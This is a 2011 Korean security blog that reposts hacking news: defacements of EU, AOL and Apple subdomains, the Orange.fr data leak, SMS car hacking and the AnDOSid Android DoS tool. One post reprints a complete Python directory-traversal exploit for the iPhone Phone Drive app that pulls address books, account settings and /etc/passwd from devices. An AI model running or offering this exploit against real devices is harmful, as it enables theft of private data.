EU의 서브 도메인 사이트가 악동 Inj3ct0r 팀에 당했다.

European Union hacked by Inj3ct0r Team


그들은 또한 자신들이 해킹한 폴더 및 파일에 대해 증거 사진으로 대외 사이트에 노출 시켰다.

One of the Sub domain of European Union hacked and Defaced by Exploit writers at Inj3ct0r Team. Hacker deface the web page and wrote "We are against nuclear weapons. We are against violence in Libya. We are against the arrest of policy Tymoshenko's in Ukraine.We are opposed to Russian influence in the territory of Ukraine!Fuck off President Medvedev, Primerministr Putin , and Yanukovich !You are idiots! You are trying to scold the Slavic peoples.You can arrest me, but you do not arrest the idea. I am not alone, we are legion."
Hacker Publish some server files and Details also ,


사악하기 그지 없다 -0-;;

[출처] http://www.thehackernews.com/2011/09/european-union-hacked-by-inj3ct0r-team.htm
Posted by bitfox
l

앞으로 진단해야할 가까운 미래(?)에 진단 대상입니다. My Car~ >ㅁ<;;

--------------------------------------------------------

Forget your car keys? Soon it won’t make a difference, as long as you have your laptop. An interesting viral Web video (see below) making the rounds since the Black Hat cybersecurity conference earlier this month depicts two researchers from iSEC Partners (a San Francisco-based security firm) breaking into a 1998 Subaru Outback via their PC. In less than 60 seconds, they wirelessly find the car’s security system module, bypass it and start the engine remotely.

iSEC researchers Don Bailey and Mat Solnik claim to be able to hack their way into a securely locked car because its alarm relies on a cell phone or satellite network that can receive commands via text messaging. Devices connecting via a cellular or satellite network are assigned the equivalent of a phone number or Web address. If hackers can figure out the number or address for a particular car, they could use a PC to send commands via text messages that instruct the car to disarm, unlock and start.

One of the reasons this text-messaging approach is disconcerting is that text messages aren’t so easy to block, unless you don’t want to receive any texts (either to your car or phone). Google Voice, iBlacklist and a few others (including wireless carriers AT&T and Verizon) do offer some tools for filtering unwanted text messages.

The researchers acknowledge that stealing a particular car would be difficult because you would have to know that car’s number or address, neither of which are easy to find. What bothers them more is that wireless-enabled systems are showing up not just in cars but also in Supervisory Control and Data Acquisition  (SCADA) systems that control and secure power plants, water-treatment facilities and other components of the nation’s critical infrastructure, they told CNET.

iSEC isn’t the only research team to have caught on to the dangers of ubiquitous networking. As Scientific American reported in April, researchers from the University of California, San Diego (UCSD), and the University of Washington in Seattle likewise claimed that a hacker could insert malicious software onto a car’s computer system using the vehicle’s Bluetooth and cell phone connections, allowing someone to use a mobile phone to unlock the car’s doors and start its engine remotely. UCSD computer science professor Stefan Savage and Washington assistant computer science and engineering professor Tadayoshi Kohno had also previously demonstrated the ability to use a computer plugged into a car’s On-Board Diagnostic system (OBD–II) port to take control of the electronic control units to (among other things) disable the brakes, selectively brake individual wheels on demand, and stop the engine—all independent of the driver’s actions (pdf). This was not done wirelessly but did highlight vulnerabilities that car-makers might want to investigate as they continue to open up their vehicles to outside communications.

Image courtesy of webphotographeer, via iStockphoto.com

 

[출처]

http://blogs.scientificamerican.com/observations/2011/08/19/hacked-in-60-seconds-thieves-could-steal-cars-via-text-messages/


Posted by bitfox
l
안드로이드 기반에 Dos 공격을 일으키는 툴이 나왔다. 역시 우려했던 바이다. -ㅅ-;
아직까지는 단순한 flood attack이지만 기본이 갖춰졌으니 DDos나 다양한 공격방식이 나오는 건
시간 문제인 것 같다.

AnDOSid the DOS tool for Android


A new product released by SCOTT HERBERT for Android mobile phones,Its AnDOSid - the DOS tool for Android Phones. The rise of groups like Anonymous and LuzSec, as well as constant India / Pakistan cyberwar has raised the issue of cyber-security high(er) in the minds of web owners.

Pentesting tools exist to simulate such attacks and help website security people defend against them, however for the most part they currently only exist for desktop computers. Mobile phones have, over the last few years, grown from simple devices that send and receive calls to mobile computing platforms which can be purchased for less than $100 a device.

AnDOSid fills that gap, allowing security professionals to simulate a DOS attack (An http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones. AnDOSid is actively being developed and I welcome feedback from the security community as to how you would like the application to evolve.


What's in this version:

  • Requires Internet access to send the http post data
  • Requires phone state to access the IMEI (one of the two identifiers sent with each post)


AnDOSid can be downloaded from the Android Market place and costs just £1 or Rs.74.58/-Only.


[출처] http://www.thehackernews.com/2011/08/andosid-dos-tool-for-android.html
[Notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]
Posted by bitfox
l
프랑스 대표 텔레콤 브랜드 Orange.fr 웹사이트가 익명의 해커로 부터 공격받아 사이트 소스 및 데이터 베이스가 노출되었다. 2010년까지 2억 천만명의 고객을 갖고 있는 세계에서 5번째로 큰 통신 업체이다.

Orange.fr
hacked, Database and site source code leaked


Anonymous Hacker Hack Orange.Fr and upload the database and Site source code backup on file sharing site. Data leaked on twitter. Orange is the brand used by France Télécom for its mobile network operator and Internet service provider subsidiaries. It is the fifth largest telecom operator in the world, with 210 million customers as of 2010. The brand was created in 1994 for Hutchison Telecom's UK mobile phone network, which was acquired by France Télécom in August 2000. In 2006, the company's ISP operations, previously Wanadoo, were also rebranded Orange. Orange is now the unique commercial façade of almost all France Telecom services. Orange France was incorporated in 2005 and has its headquarters in Arcueil, France.

Today UK Police has Charge another alleged Anonymous member in Hacking Cases. A student has been charged with involvement in cyber attacks by the hacking group Anonymous against companies that withdrew online payment services from WikiLeaks.

[출처] http://www.thehackernews.com/2011/08/orangefr-hacked-database-and-site.html
Posted by bitfox
l
AOL Postmaster Website hacked by HODLUM

AOL’spostmaster.aol.com website was hacked Saturday afternoon by someone who goes by the name “HodLuM.” The site was slightly defaced with a message from the hacker. “AOL S3RV3RZ ROOT3D BY HODLUM LOLZ!,” the message read.

AOL finally discovered the hack, and fixed the page between two and four hours after evidence of the breach was posted to Reddit.com. The various forums where this hack was posted all included various jokes along the lines of, “AOL still exists?!” Ouch…

The AOL Postermaster blog has so far not responded to the hack. The hack of AOL Postmaster comes at the end of a difficult week for AOL. While the hack of a minor AOL web property has nothing to do with the poor performance of its stock, the incident can only serve to worsen the mood at a company that’s struggling to stay upright.

AOL도 크래킹 되었군요. 비록 서브 도메인이지만... 장난이 심한 HODLUM 크래커들..


[출처] http://www.thehackernews.com/2011/08/aol-postmaster-website-hacked-by-hodlum.html
 

Posted by bitfox
l
천하의 애플도 당했군요. 메인 도메인은 아니지만 서브 도메인이라도.. 글쎄요. 글로벌 기업에 대한 경험(?)은 있지만 이런 데는 어떻게 되어 있으려나..ㅎ


One of the Apple Sub-Domain claimed to be Defaced By HodLuM as shown above. The Deface Link is just an IMAGE uploaded to Apple domain. Hacker use "N00BZ" word for all Hacker including Anonymous , Lulzsec, Turkish hackers, Inj3t0rs and Exploit-DB's. AOL Postmaster Website was also got hacked by HODLUM some months before.


[출처] : http://www.thehackernews.com/2011/08/apple-website-hacked-by-hodlum.html
Posted by bitfox
l
Jailbroken 된 아이폰/아이패드에서 Directory Traversal 취약점 공개.
아래 코드를 보시면 아시겠지만 파이썬으로 개인 주소록을 갈취하는 코드 작성하여
공개되었네요.
역시 Jailbroken은 왠만하면 하지 맙시다.


#!/usr/bin/python
#----------------------------------------------------------------
#Software : iPhone/iPad Phone Drive 1.1.1
#Type of vulnerability : Directory Traversal
#Tested On : iPhone 4 (IOS 4.3.3/Jailbroken)
#----------------------------------------------------------------
#Program Developer : http://ax.itunes.apple.com/app/id431033044?mt=8
#----------------------------------------------------------------
#Discovered by : Khashayar Fereidani
#Team Website : Http://IRCRASH.COM
#English Forums : Http://IRCRASH.COM/forums/
#Team Members : Khashayar Fereidani , Arash Allebrahim
#Email : irancrash [ a t ] gmail [ d o t ] com
#Facebook : http://facebook.com/fereidani
#Twitter : http://twitter.com/ircrash
#----------------------------------------------------------------
import urllib2
def urlread(url,file):
    url = url+"/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f"+file
    u = urllib2.urlopen(url)
    localFile = open('result.html', 'w')
    localFile.write(u.read())
    localFile.close()
    print "file saved as result.html\nIRCRASH.COM 2011"
print "----------------------------------------\n- iPhone/iPad Phone Drive 1.1.1 DT     -\n- Discovered by : Khashayar Fereidani  -\n- http://ircrash.com/                  -\n----------------------------------------"
url = raw_input("Enter Address ( Ex. : http://192.168.1.101:8080 ):")
f = ["","/private/var/mobile/Library/AddressBook/AddressBook.sqlitedb","/private/var/mobile/Library/Safari","/private/var/mobile/Library/Preferences/com.apple.accountsettings.plist","/private/var/mobile/Library/Preferences/com.apple.conference.plist","/etc/passwd"]
print f[1]
id = int(raw_input("1 : Phone Book\n2 : Safari Fav\n3 : Users Email Info\n4 : Network Informations\n5 : Passwd File\n6 : Manual File Selection\n Enter ID:"))
if not('http:' in url):
    url='http://'+url
if ((id>0) and (id<6)):
    file=f[id]
    urlread(url,file)
if (id==6):
    file=raw_input("Enter Local File Address : ")
    urlread(url,file)


[출처] www.exploit-db.com/exploits/17645/

[notice: 악의적인 사용시 사용자 본인에게 책임이 있음을 공지합니다.]
Posted by bitfox
l

우주는 신비를 넘어 경의롭다.. :>

[출처] http://hubblesite.org/gallery/album/galaxy/pr2004004a/
Posted by bitfox
l